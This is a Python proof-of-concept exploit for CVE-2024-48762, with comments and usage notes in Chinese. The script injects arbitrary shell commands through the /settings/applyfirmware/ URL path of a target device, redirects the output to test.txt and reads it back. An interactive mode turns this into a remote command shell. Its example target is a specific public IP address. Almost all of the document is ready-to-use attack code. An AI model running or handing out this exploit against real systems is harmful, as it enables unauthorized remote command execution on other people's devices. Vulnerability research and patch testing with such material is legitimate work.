import requests
import argparse
import time

def poc(url, command):
    payload_url = f"{url}/settings/applyfirmware/;{command}>test.txt;/false"
    headers = {
        "Host": url.split("//")[1].split(":")[0]  # 提取 Host 部分
    }
    requests.get(url=payload_url, headers=headers, verify=False)
    
    # 等待命令执行完成
    time.sleep(0.5)
    
    # 访问 test.txt 获取命令输出
    result_url = f"{url}/test.txt"
    response = requests.get(url=result_url, headers=headers, verify=False)
    return response.text

def interactive_mode(url):
    print(r'''
         ______   ______    ___  ___  ___ ____     ____ ___ ________ ___
        / ___/ | / / __/___|_  |/ _ \|_  / / /____/ / /( _ )_  / __/|_  |
       / /__ | |/ / _//___/ __// // / __/_  _/___/_  _/ _  |/ / _ \/ __/
       \___/ |___/___/   /____/\___/____//_/      /_/ \___//_/\___/____/

                                                                                                    
                              		                     CVE-2024-48762 By XU17
    ''')
    while True:
        cmd = input('cmd >>> ')
        if cmd.lower() == 'exit':
            break
        result = poc(url, cmd)
        print(result)

def main():
    parser = argparse.ArgumentParser(description="POC for ROxKI vulnerability")
    parser.add_argument("-u", "--url", required=True, help="Base URL to test (e.g., http://222.103.211.89:8004)")
    parser.add_argument("-c", "--command", help="Command to execute (e.g., whoami)")
    parser.add_argument("-i", "--interactive", action="store_true", help="Enter interactive command mode")
    args = parser.parse_args()

    if args.interactive:
        interactive_mode(args.url)
    elif args.command:
        result = poc(args.url, args.command)
        print(result)
    else:
        parser.print_help()

if __name__ == '__main__':
    main()


# 使用方法：

# 单次执行命令模式：
# bash
# python CVE-2024-48762.py -u http://example.com -c "whoami"
# 交互模式：
# bash
# python CVE-2024-48762.py -u http://example.com -i
# 在交互模式中，您可以持续输入命令，直到输入"exit"退出。